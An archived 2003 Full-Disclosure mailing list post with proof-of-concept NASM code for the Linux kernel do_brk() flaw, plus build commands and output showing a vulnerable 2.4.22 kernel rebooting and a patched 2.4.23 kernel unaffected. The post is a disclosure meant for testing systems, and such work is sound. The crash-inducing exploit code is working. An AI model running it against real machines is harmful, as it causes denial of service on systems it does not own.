Nmap stealth port scanner
*Intro
*Docs
*Download
Security Tools
Good Reading
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Vuln Dev
*Basics
*More
News
Links
Exploit World
Advertising
About/Contact
Credits


FullDisclosure: Linux kernel do_brk() proof-of-concept exploit code

From: Christophe Devine (DEVINE_at_iie.cnam.fr)
Date: Dec 01 2003


The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.

$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out

$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0

(system reboots when the program exits)

$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out

(the program exits gracefully)

$ cat brk_poc.asm

  ; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

  BITS 32

                org 0xBFFFF000

  ehdr: ; Elf32_Ehdr
                db 0x7F, "ELF", 1, 1, 1 ; e_ident
        times 9 db 0
                dw 2 ; e_type
                dw 3 ; e_machine
                dd 1 ; e_version
                dd _start ; e_entry
                dd phdr - $$ ; e_phoff
                dd 0 ; e_shoff
                dd 0 ; e_flags
                dw ehdrsize ; e_ehsize
                dw phdrsize ; e_phentsize
                dw 1 ; e_phnum
                dw 0 ; e_shentsize
                dw 0 ; e_shnum
                dw 0 ; e_shstrndx

  ehdrsize equ $ - ehdr

  phdr: ; Elf32_Phdr
                dd 1 ; p_type
                dd 0 ; p_offset
                dd $$ ; p_vaddr
                dd $$ ; p_paddr
                dd filesize ; p_filesz
                dd 0x4000 ; p_memsz
                dd 7 ; p_flags
                dd 0x1000 ; p_align

  phdrsize equ $ - phdr

  _start:

                mov eax, 162
                mov ebx, timespec
                int 0x80

                mov eax, 1
                mov ebx, 0
                int 0x80

  timespec dd 20,0

  filesize equ $ - $$

-- 
Christophe Devine - http://www.cr0.net:8040/about/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[ Nmap | Tools | Lists | Reading | News | About/Contact | Advertising | Privacy Policy ]
[ Web Archive generated using Hypermail]